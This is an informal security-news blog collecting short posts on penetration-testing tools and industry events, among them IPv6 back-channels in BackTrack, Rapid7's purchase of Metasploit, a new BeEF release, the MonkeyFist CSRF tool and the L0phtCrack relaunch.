Here’s an interesting post on using IPv6 to cover your tracks with Back Track.
Hmm. Alliteration. (ok, no.) 
From Network World:
This past week I was working on performing a security assessment and I was using the latest version of BackTrack 4. I noticed that it has Miredo support to help auditors establish a secret IPv6 back-channel to their exploited systems. This shows that the security community is recognizing how IPv6 can be used as a backdoor to owned systems.
Let’s face it; IPv6 deployments haven’t been as numerous as many of us would have hoped. Several years ago we were expecting that at the end of 2009 migration to IPv6 would be in full motion. However, the fact that IPv6 is still fairly obscure to most security administrators means that is can fly under the radar of most organizations. However, IPv6 is starting to gain the attention of hackers as a means of creating a covert channel to compromised systems.
For the full article read on.
There’s an app for that. Cisco has released an app for security alerts. The real rub is that this only appears to be an RSS feed. Albeit, a start.
From The Register:
Cisco has pushed out a new iPhone app that helps IT managers respond to newly-detected security threats by the seat (pocket) of their pants.
The Cisco SIO To Go iPhone application beams in data from the company’s Security Intelligence Operations (SIO) to show a customizable menagerie of security information that could potentially help defend a business network.
But, that’s not all. You can also follow…their Twitter & YouTube feeds.
So, potentially.
Well, nothing like an open source project being bought by a company to cure my writers block. That’s right the company Rapid7 purchased the Metasploit project. Now, before panic sets in, they have committed to keeping the project open source and community based. This will no doubt lead to some raised eyebrows as some will agonize over the corporate spectre on this project. I have had some people privately comment to me that they aren’t overly happy with this as they don’t feel like doing Rapid7’s work for them pro bono.
A different view is that now the project has the resources to commit to growing and improving the Metasploit project.
I myself have yet to formulate an opinion either way. I would like to say thanks to my tipsters that gave me a heads up earlier this week.
Most importantly, congrats to HD Moore for seeing his love child grow to fruition!
From Metasploit:
I created the Metasploit Project over six years ago as way to publish security information to those who needed it most, the security professionals in the field. The project has evolved from a personal web site, to a collaborative effort with a small group of friends, and finally to the robust community-driven project that we know today. This progress came at the cost of the evenings, lunch hours, early mornings, and weekends of countless contributors who donate their time for the benefit of the community. The volunteer nature of the project has lead to innovation in niche areas and has driven research across a wide range of topics.
Read on for the full post.
…now if I could just get some one to buy Liquidma…er, nevermind.
As of earlier tonight a project a few months in the making has finally been unleashed (pun intended). Thanks to the great guys over at Offensive Security and whoever’s awesome idea it was to team them up with the Metasploit guys, a new resource called Metasploit Unleashed – Mastering the Framework is now online.
For those of you who don’t know, Offensive-Security are the people behind the Penetration Testing with Backtrack Trainings. Now they have teamed up with HD Moore and the Metasploit folks and put together the most comprehensive Metasploit training out there.
Best of all, it is free and for a good cause.
“This free information security training is brought to you in a community effort to promote awareness and raise funds for underprivileged children in East Africa. Through a heart-warming effort by several security professionals, we are proud to present the most complete and in-depth open course about the Metasploit Framework.”
To really drive the point home, they decided 2 all stars weren’t enough and threw in a 3rd team mate with Johnny Long and Hackers For Charity.
If you enjoy it and find it useful, we ask that you make a donation to the HFC (Hackers For Charity), $4.00 will feed a child for a month, so any contribution is welcome. We hope you enjoy this course as much as we enjoyed making it.
The “full” version of this course includes a PDF guide (it has the same material as the wiki) and a set of flash videos which walk you though the modules. You may purchase these materials from the Offensive Security Training page. All proceeds from this course go to HFC.
I highly recommend if you are interested in learning more about the Metasploit Framework that you float over this way and even if you’re not interested you should absolutely make a donation to HFC none the less.
Get it while its hot!
Matt
Hot off the press. Great news today! Wade dropped me a line to let me know that a new version of BeEF was just released! For those of you who might not be familiar with the tool its a browser exploitation framework that’s full of WIN! Oh, and that includes integration with Metasploit.
From Bindshell.net:
BeEF is a browser exploitation framework. This tool will demonstrate the collecting of zombie browsers and browser vulnerabilities in real-time. It provides a command and control interface which facilitates the targeting of individual or groups of zombie browsers.
Enhancements in the latest version include:
* Integration with Metasploit via XMLRPC
* Mozilla extension exploitation support
* New browser functionality detection modules
* Tiered logging for module actions and results
Here are some screenshots:
Just to be clear, that BeEF, not Beefcake 
Tags: BeEF, Browser Exploitation, XSS, Wade Alcorn
Weaponizing the Web – Shawn Moyer & Nathan Hamiel
Nathan and Shawn were two of my favorite speakers so far. They both are very smart and awesome guys, buy them beer
On that note, their talk about weaponizing the web was pretty damn cool to sit in on. For the majority of their talk they reviewed why the social web is such an easily corruptible environment. User Generated Content on an increasing number of supremely popular sites being the giant attack surface. User driven, social, collaborative content, blogs, wikis, and web communities are everywhere you look. Sometimes these things are even being integrated into “old” web media.
Some examples of issues that have popped up in recent times that Nathan and Shawn covered were Moot being voted as the Time’s person of the year, Post Micheal Jackson celebrity death hoaxes causing “legitimate” news sources to run false stories (RIP Jeff Goldblum), and New York Times aggregation fail where an article about HTML injection propagated HTML injection.
The emerging socialized web is creating a popular platform for multi-site aggregation which in the attacker’s eyes equals return on investment. Multi-point attack surfaces, APIs, “Digg This!”, etc.
“Malware-like” legitimate functionality is becoming more widely accepted as tolerable, such as silent updates, calling home, and offsite links.
Here is the awesome part, Nathan has released a new tool. He calls it MonkeyFist and it is a PoC Dynamic CSRF Tool. It includes a small python web server, creates payload/patterns based on referrer, automates per-request “dynamic” CSRF, and constructs hidden POSTS & redirects.
NIST, helping find the flaws so the bad guys won’t.
From Gov Info Security:
A new report from the National Institute of Standards and Technology (NIST) examines static analyzers, software that identifies weaknesses in other programs that could be triggered accidentally or exploited by hackers.
The report, SP- 500-279, will help toolmakers assess their products’ ability to find security defects in other software, according to NIST. Eight tool developers, along with a ninth team of professional human reviewers, participated in the Static Analysis Tool Exposition, or SATE, an exercise by NIST and static analyzer vendors that began in February 2008 to improve the performance of these tools.
Every little bit helps.
OK, this is kind of cool. Voltage has released an interactive map with breach data provided by the good folks at datalossdb.
From Voltage:
- The chances of one or more data breaches that expose 1M+ records in the next year is a virtual certainty: 99.9999%
- We will likely see 1 or 2 data breaches in the next year that expose 10M+ records – equivalent to 5% of US adult population
- We will probably see about 14 data breaches in the next year that expose 1M+ records – 1 in 200 citizens
It allows you to drill down on the respective incidents.
Give it a whirl. Nice way to kill some time.
Well, today is the day. The L0phtcrack site has gone live. At least one reader had an interesting moment when he tried to download the software.
From @andrewsmhay
wow….eSafe certainly doesn’t like the d/l – “Infected with Win32.Infostealer.ga (Non-Removable), Whole File Blocked”
Oops. [UPDATE: It was a hyperactive antivirus program that didn't know any better]
As to the product launch itself:
The code and L0phtCrack name have taken a long strange trip from proof of concept code for a vulnerability in 1997 to a commercial application funding the L0pht’s security research to being sold as a product by the security consulting company @stake and then by the largest security software company in the world, Symantec. Now it is back in the hands of the original authors from the L0pht who are giving it the care and feeding it deserves.
Watch the video.
Budgets are a problem of late for a lot of people. They’re getting slashed and in many cases it’s just becoming too hard to make ends meet for security programs. One possible solution it GFI’s LANguard. The reason I bring this up is that I’ve gotten word that this Thursday GFI will be announcing a free version of their scanner. When you download the trial version, which gives you 10 days, it will switch to a full featured version after that for up to 5 IP addresses.
From GFI:
Top Features
* Identify security vulnerabilities and take remedial action
* Detect Virtual Machines
* Automatic remediation of unauthorized applications
* Automatic deployment of network-wide patch and service pack management
* Easily analyze and filter scan results
Sure, it’s not a lot but, five IP addresses for free isn’t too shabby. Look for the official announcement this Thursday.
